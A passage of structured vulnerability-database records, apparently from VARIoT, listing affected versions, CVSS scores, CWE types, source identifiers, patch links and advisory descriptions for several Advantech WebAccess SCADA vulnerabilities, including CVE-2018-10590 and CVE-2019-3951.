"JVNDB-2019-013206", "trust": 0.8 }, { "db": "IVD", "id": "C5586C26-C6EB-4540-AC12-D193950F7B2D", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-155386", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "c5586c26-c6eb-4540-ac12-d193950f7b2d" }, { "db": "CNVD", "id": "CNVD-2019-45387" }, { "db": "VULHUB", "id": "VHN-155386" }, { "db": "JVNDB", "id": "JVNDB-2019-013206" }, { "db": "CNNVD", "id": "CNNVD-201912-657" }, { "db": "NVD", "id": "CVE-2019-3951" } ] }, "id": "VAR-201912-0756", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "c5586c26-c6eb-4540-ac12-d193950f7b2d" }, { "db": "CNVD", "id": "CNVD-2019-45387" }, { "db": "VULHUB", "id": "VHN-155386" } ], "trust": 1.33470696 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "c5586c26-c6eb-4540-ac12-d193950f7b2d" }, { "db": "CNVD", "id": "CNVD-2019-45387" } ] }, "last_update_date": "2024-11-23T22:33:38.516000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Advantech WebAccess", "trust": 0.8, "url": "https://www.advantech.co.jp/industrial-automation/webaccess" }, { "title": "Patch for Advantech WebAccess Buffer Overflow Vulnerability (CNVD-2019-45387)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/194185" }, { "title": "Advantech WebAccess Buffer error vulnerability fix", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=105656" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2019-45387" }, { "db": "JVNDB", "id": "JVNDB-2019-013206" }, { "db": "CNNVD", "id": "CNNVD-201912-657" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-787", "trust": 1.9 }, { "problemtype": "CWE-121", "trust": 1.0 } ], "sources": [ { "db": "VULHUB", "id": "VHN-155386" }, { "db": "JVNDB", "id": "JVNDB-2019-013206" }, { "db": "NVD", "id": "CVE-2019-3951" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.1, "url": "https://www.tenable.com/security/research/tra-2019-52" }, { "trust": 2.0, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-3951" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-3951" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2019-45387" }, { "db": "VULHUB", "id": "VHN-155386" }, { "db": "JVNDB", "id": "JVNDB-2019-013206" }, { "db": "CNNVD", "id": "CNNVD-201912-657" }, { "db": "NVD", "id": "CVE-2019-3951" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "c5586c26-c6eb-4540-ac12-d193950f7b2d" }, { "db": "CNVD", "id": "CNVD-2019-45387" }, { "db": "VULHUB", "id": "VHN-155386" }, { "db": "JVNDB", "id": "JVNDB-2019-013206" }, { "db": "CNNVD", "id": "CNNVD-201912-657" }, { "db": "NVD", "id": "CVE-2019-3951" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2019-12-16T00:00:00", "db": "IVD", "id": "c5586c26-c6eb-4540-ac12-d193950f7b2d" }, { "date": "2019-12-16T00:00:00", "db": "CNVD", "id": "CNVD-2019-45387" }, { "date": "2019-12-12T00:00:00", "db": "VULHUB", "id": "VHN-155386" }, { "date": "2019-12-23T00:00:00", "db": "JVNDB", "id": "JVNDB-2019-013206" }, { "date": "2019-12-12T00:00:00", "db": "CNNVD", "id": "CNNVD-201912-657" }, { "date": "2019-12-12T21:15:12.120000", "db": "NVD", "id": "CVE-2019-3951" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2019-12-16T00:00:00", "db": "CNVD", "id": "CNVD-2019-45387" }, { "date": "2019-12-18T00:00:00", "db": "VULHUB", "id": "VHN-155386" }, { "date": "2019-12-23T00:00:00", "db": "JVNDB", "id": "JVNDB-2019-013206" }, { "date": "2020-06-16T00:00:00", "db": "CNNVD", "id": "CNNVD-201912-657" }, { "date": "2024-11-21T04:42:55.940000", "db": "NVD", "id": "CVE-2019-3951" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201912-657" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess Vulnerable to out-of-bounds writing", "sources": [ { "db": "JVNDB", "id": "JVNDB-2019-013206" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Buffer error", "sources": [ { "db": "IVD", "id": "c5586c26-c6eb-4540-ac12-d193950f7b2d" }, { "db": "CNNVD", "id": "CNNVD-201912-657" } ], "trust": 0.8 } }
var-201805-0250
Vulnerability from variot
In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, an information exposure vulnerability through directory listing has been identified, which may allow an attacker to find important files that are not normally visible. Advantech WebAccess Contains a vulnerability in the disclosure of file and directory information.Information may be obtained. Advantech WebAccess and others are products of Advantech. Advantech WebAccess is a browser-based HMI/SCADA software. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. WebAccess Dashboard is one of the dashboard components; WebAccess Scada Node is one of the monitoring node components. WebAccess/NMS is a suite of web browsers for the Network Management System (NMS). Security vulnerabilities exist in several Advantech products. An attacker could exploit this vulnerability to obtain important files that are not visible. Multiple SQL-injection vulnerabilities 2. An information-disclosure vulnerability 3. A file-upload vulnerability 4. Multiple directory-traversal vulnerabilities 5. Multiple stack-based buffer-overflow vulnerabilities 6. A heap-based buffer-overflow vulnerability 7. Multiple arbitrary code-execution vulnerabilities 8. A denial-of-service vulnerability 9. A security-bypass vulnerability 10. A privilege-escalation vulnerability An attacker can exploit these issues to execute arbitrary code in the context of the application, or modify data, or exploit latent vulnerabilities in the underlying database, delete arbitrary files, gain elevated privileges, perform certain unauthorized actions, upload arbitrary files to the affected application gain unauthorized access and obtain sensitive information. Failed attacks will cause denial of service conditions. Advantech WebAccess, etc. Advantech WebAccess is a set of HMI/SCADA software based on browser architecture. The following versions are affected: Advantech WebAccess 8.2_20170817 and earlier, 8.3.0 and earlier; WebAccess Dashboard 2.0.15 and earlier; WebAccess Scada Node 8.3.1 and earlier; WebAccess/NMS 2.0.3 and earlier
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201805-0250", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "lte", "trust": 1.8, "vendor": "advantech", "version": "8.2_20170817" }, { "model": "webaccess", "scope": "lte", "trust": 1.8, "vendor": "advantech", "version": "8.3.0" }, { "model": "webaccess dashboard", "scope": "lte", "trust": 1.8, "vendor": "advantech", "version": "2.0.15" }, { "model": "webaccess scada node", "scope": "lt", "trust": 1.4, "vendor": "advantech", "version": "8.3.1" }, { "model": "webaccess\\/nms", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "2.0.3" }, { "model": "webaccess scada", "scope": "lt", "trust": 1.0, "vendor": "advantech", "version": "8.3.1" }, { "model": "webaccess dashboard", "scope": "eq", "trust": 0.9, "vendor": "advantech", "version": "2.0.15" }, { "model": "webaccess/nms", "scope": "lte", "trust": 0.8, "vendor": "advantech", "version": "2.0.3" }, { "model": "webaccess dashboard", "scope": "lte", "trust": 0.6, "vendor": "advantech", "version": "\u003c=2.0.15" }, { "model": "webaccess/nms", "scope": "lte", "trust": 0.6, "vendor": "advantech", "version": "\u003c=2.0.3" }, { "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "8.3.0" }, { "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "8.2_20170817" }, { "model": "webaccess\\/nms", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "2.0.3" }, { "model": null, "scope": "eq", "trust": 0.4, "vendor": "webaccess", "version": "*" }, { "model": "webaccess/nms", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "2.0.3" }, { "model": "webaccess/nms", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "2.0" }, { "model": "webaccess scada node", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.3" }, { "model": "webaccess dashboard", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "2.0" }, { "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.3" }, { "model": "webaccess 8.2 20170817", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "model": "webaccess 8.2 20170330", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.2" }, { "model": "webaccess 8.1 20160519", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.1" }, { "model": "webaccess 8.0 20150816", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8" }, { "model": "webaccess", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": "8.3.1" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess dashboard", "version": "*" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess scada", "version": "*" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess nms", "version": "*" } ], "sources": [ { "db": "IVD", "id": "e2ef868f-39ab-11e9-8037-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-09823" }, { "db": "BID", "id": "104190" }, { "db": "JVNDB", "id": "JVNDB-2018-005068" }, { "db": "CNNVD", "id": "CNNVD-201805-450" }, { "db": "NVD", "id": "CVE-2018-10590" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true }, { "cpe22Uri": "cpe:/a:advantech:webaccess_dashboard", "vulnerable": true }, { "cpe22Uri": "cpe:/a:advantech:webaccess_scada", "vulnerable": true }, { "cpe22Uri": "cpe:/a:advantech:webaccess%2fnms", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2018-005068" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Mat Powell, rgod, Steven Seeley, Donato Onofri and Simone Onofri", "sources": [ { "db": "BID", "id": "104190" } ], "trust": 0.3 }, "cve": "CVE-2018-10590", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2018-10590", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2018-09823", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "e2ef868f-39ab-11e9-8037-000c29342cb1", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "VHN-120365", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2018-10590", "impactScore": 3.6, "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.8, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2018-10590", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2018-10590", "trust": 0.8, "value": "High" }, { "author": "CNVD", "id": "CNVD-2018-09823", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201805-450", "trust": 0.6, "value": "HIGH" }, { "author": "IVD", "id": "e2ef868f-39ab-11e9-8037-000c29342cb1", "trust": 0.2, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-120365", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "e2ef868f-39ab-11e9-8037-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-09823" }, { "db": "VULHUB", "id": "VHN-120365" }, { "db": "JVNDB", "id": "JVNDB-2018-005068" }, { "db": "CNNVD", "id": "CNNVD-201805-450" }, { "db": "NVD", "id": "CVE-2018-10590" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, an information exposure vulnerability through directory listing has been identified, which may allow an attacker to find important files that are not normally visible. Advantech WebAccess Contains a vulnerability in the disclosure of file and directory information.Information may be obtained. Advantech WebAccess and others are products of Advantech. Advantech WebAccess is a browser-based HMI/SCADA software. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. WebAccess Dashboard is one of the dashboard components; WebAccess Scada Node is one of the monitoring node components. WebAccess/NMS is a suite of web browsers for the Network Management System (NMS). Security vulnerabilities exist in several Advantech products. An attacker could exploit this vulnerability to obtain important files that are not visible. Multiple SQL-injection vulnerabilities\n2. An information-disclosure vulnerability\n3. A file-upload vulnerability\n4. Multiple directory-traversal vulnerabilities\n5. Multiple stack-based buffer-overflow vulnerabilities\n6. A heap-based buffer-overflow vulnerability\n7. Multiple arbitrary code-execution vulnerabilities\n8. A denial-of-service vulnerability\n9. A security-bypass vulnerability\n10. A privilege-escalation vulnerability\nAn attacker can exploit these issues to execute arbitrary code in the context of the application, or modify data, or exploit latent vulnerabilities in the underlying database, delete arbitrary files, gain elevated privileges, perform certain unauthorized actions, upload arbitrary files to the affected application gain unauthorized access and obtain sensitive information. Failed attacks will cause denial of service conditions. Advantech WebAccess, etc. Advantech WebAccess is a set of HMI/SCADA software based on browser architecture. The following versions are affected: Advantech WebAccess 8.2_20170817 and earlier, 8.3.0 and earlier; WebAccess Dashboard 2.0.15 and earlier; WebAccess Scada Node 8.3.1 and earlier; WebAccess/NMS 2.0.3 and earlier", "sources": [ { "db": "NVD", "id": "CVE-2018-10590" }, { "db": "JVNDB", "id": "JVNDB-2018-005068" }, { "db": "CNVD", "id": "CNVD-2018-09823" }, { "db": "BID", "id": "104190" }, { "db": "IVD", "id": "e2ef868f-39ab-11e9-8037-000c29342cb1" }, { "db": "VULHUB", "id": "VHN-120365" } ], "trust": 2.7 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2018-10590", "trust": 3.6 }, { "db": "ICS CERT", "id": "ICSA-18-135-01", "trust": 3.4 }, { "db": "BID", "id": "104190", "trust": 2.0 }, { "db": "CNVD", "id": "CNVD-2018-09823", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201805-450", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2018-005068", "trust": 0.8 }, { "db": "IVD", "id": "E2EF868F-39AB-11E9-8037-000C29342CB1", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-120365", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "e2ef868f-39ab-11e9-8037-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-09823" }, { "db": "VULHUB", "id": "VHN-120365" }, { "db": "BID", "id": "104190" }, { "db": "JVNDB", "id": "JVNDB-2018-005068" }, { "db": "CNNVD", "id": "CNNVD-201805-450" }, { "db": "NVD", "id": "CVE-2018-10590" } ] }, "id": "VAR-201805-0250", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "e2ef868f-39ab-11e9-8037-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-09823" }, { "db": "VULHUB", "id": "VHN-120365" } ], "trust": 1.5434040525000001 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "e2ef868f-39ab-11e9-8037-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-09823" } ] }, "last_update_date": "2024-11-23T21:53:07.924000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://www.advantech.com/industrial-automation/webaccess/webaccessscada" }, { "title": "Patch for Advantech WebAccess Information Disclosure Vulnerability (CNVD-2018-09823)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/129391" }, { "title": "Multiple Advantech Product security vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=80060" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2018-09823" }, { "db": "JVNDB", "id": "JVNDB-2018-005068" }, { "db": "CNNVD", "id": "CNNVD-201805-450" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-538", "trust": 1.9 }, { "problemtype": "CWE-548", "trust": 1.0 } ], "sources": [ { "db": "VULHUB", "id": "VHN-120365" }, { "db": "JVNDB", "id": "JVNDB-2018-005068" }, { "db": "NVD", "id": "CVE-2018-10590" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.4, "url": "https://ics-cert.us-cert.gov/advisories/icsa-18-135-01" }, { "trust": 1.7, "url": "http://www.securityfocus.com/bid/104190" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-10590" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10590" }, { "trust": 0.3, "url": "http://webaccess.advantech.com" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2018-09823" }, { "db": "VULHUB", "id": "VHN-120365" }, { "db": "BID", "id": "104190" }, { "db": "JVNDB", "id": "JVNDB-2018-005068" }, { "db": "CNNVD", "id": "CNNVD-201805-450" }, { "db": "NVD", "id": "CVE-2018-10590" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "e2ef868f-39ab-11e9-8037-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-09823" }, { "db": "VULHUB", "id": "VHN-120365" }, { "db": "BID", "id": "104190" }, { "db": "JVNDB", "id": "JVNDB-2018-005068" }, { "db": "CNNVD", "id": "CNNVD-201805-450" }, { "db": "NVD", "id": "CVE-2018-10590" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2018-05-18T00:00:00", "db": "IVD", "id": "e2ef868f-39ab-11e9-8037-000c29342cb1" }, { "date": "2018-05-17T00:00:00", "db": "CNVD", "id": "CNVD-2018-09823" }, { "date": "2018-05-15T00:00:00", "db": "VULHUB", "id": "VHN-120365" }, { "date": "2018-05-15T00:00:00", "db": "BID", "id": "104190" }, { "date": "2018-07-05T00:00:00", "db": "JVNDB", "id": "JVNDB-2018-005068" }, { "date": "2018-05-16T00:00:00", "db": "CNNVD", "id": "CNNVD-201805-450" }, { "date": "2018-05-15T22:29:00.317000", "db": "NVD", "id": "CVE-2018-10590" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2018-05-18T00:00:00", "db": "CNVD", "id": "CNVD-2018-09823" }, { "date": "2019-10-09T00:00:00", "db": "VULHUB", "id": "VHN-120365" }, { "date": "2018-05-15T00:00:00", "db": "BID", "id": "104190" }, { "date": "2018-07-05T00:00:00", "db": "JVNDB", "id": "JVNDB-2018-005068" }, { "date": "2019-10-17T00:00:00", "db": "CNNVD", "id": "CNNVD-201805-450" }, { "date": "2024-11-21T03:41:37.093000", "db": "NVD", "id": "CVE-2018-10590" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201805-450" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess Vulnerable to file and directory information disclosure", "sources": [ { "db": "JVNDB", "id": "JVNDB-2018-005068" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "lack of information", "sources": [ { "db": "CNNVD", "id": "CNNVD-201805-450" } ], "trust": 0.6 } }
var-202310-0320
Vulnerability from variot
Advantech WebAccess version 9.1.3 contains an exposure of sensitive information to an unauthorized actor vulnerability that could leak user credentials. Advantech Provided by the company WebAccess The following vulnerabilities exist in. It was * information leak (CWE-200) - CVE-2023-4215If the vulnerability is exploited, it may be affected as follows. It was * When configuring or changing your account information on that device; Cloud Agent Debug User credentials are stolen using the service
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-202310-0320", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "eq", "trust": 1.0, "vendor": "advantech", "version": "9.1.3" }, { "model": "webaccess", "scope": "eq", "trust": 0.8, "vendor": "\u30a2\u30c9\u30d0\u30f3\u30c6\u30c3\u30af\u682a\u5f0f\u4f1a\u793e", "version": null }, { "model": "webaccess", "scope": "eq", "trust": 0.8, "vendor": "\u30a2\u30c9\u30d0\u30f3\u30c6\u30c3\u30af\u682a\u5f0f\u4f1a\u793e", "version": 